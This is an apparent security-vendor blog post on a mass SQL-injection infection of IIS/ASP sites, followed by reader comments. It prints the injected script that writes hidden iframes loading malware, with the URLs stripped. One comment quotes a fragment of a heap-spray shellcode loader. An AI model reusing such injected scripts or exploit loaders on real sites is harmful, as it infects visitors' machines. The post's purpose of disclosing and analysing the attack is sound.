Mass infection of IIS/ASP sites –

A large number of sites have been hacked again in the last few hours with a malware script pointing to . Not only small sites, but some big ones got hit as well. It is the same SQL injection attack as used in the robint-us mass infection of a few days ago.

Some of the sites hacked this time:

This time Google says that around 1 thousand pages have been infected. This is the content of the yahoo.js script:

try{__m}catch(e){__m=1;document.title=document.title.replace(/<(w|W)*> /,””);document.write(“< iframe src= width=0 height==>
<iframe src= width=22 height=1

So it loads malware from, which then calls to load the virus. This is the output of our scan agaisnt

What is funny is that one of the top pages that got hacked was and their seminar about “Understanding SQL Server Security Options”. Just search on Google for “””” to see it.

If your site is hacked (or contains malware), and you need help, send us an email at or visit our site: Sucuri Security. We can get your sites clean up right away.

Also, consider checking out our site security monitoring. We will monitor your sites 24×7 and alert you if it ever gets infected with malware, hacked or blacklisted.

  1. Don't forget it's pulling of ie.html as well which seems to be attempting shellcode and also embeds a hidden anhey.swf.

    From the 'sun' div:
    var a = new Array();
    var xcode=loader("log.txt","MM","NN")*262144;
    var shellcode=loader("log.txt","XX","YY");
    var ls = xcode-(shellcode.length*2 0x01020);
    var b = loader("log.txt","VV","WW");
    b =b;
    var lh=b.substring(0,ls/2);
    delete b;
    lh = lh shellcode;

  2. This is exactly why sites that force javascript on visitors is exactly the wrong thing to do.

    When online banking users are forced to adopt loose security settings to do the simplest of tasks, then eventually they become the default, and that’s when things go wrong.

    Security conscious sites should *not* let their developers run amok demanding ever greater browser permissions. Instead, they should be looking at opportunities to work with less browser permissions.

  3. Since the Idera pages are httpS, they will pass right through any firewalls, proxy servers and unified threat management gateways that do not perform man-in-the-middle SSL interception. That leaves just the desktop AV to defend corporate networks and we all know how weak of a defense they are.

  4. What is the 3rd party app installed that is vulnerable to SQL injection? That is, what vulnerability in the sites is allowing malicious users to inject the malware to begin with?

Comments are closed.

You May Also Like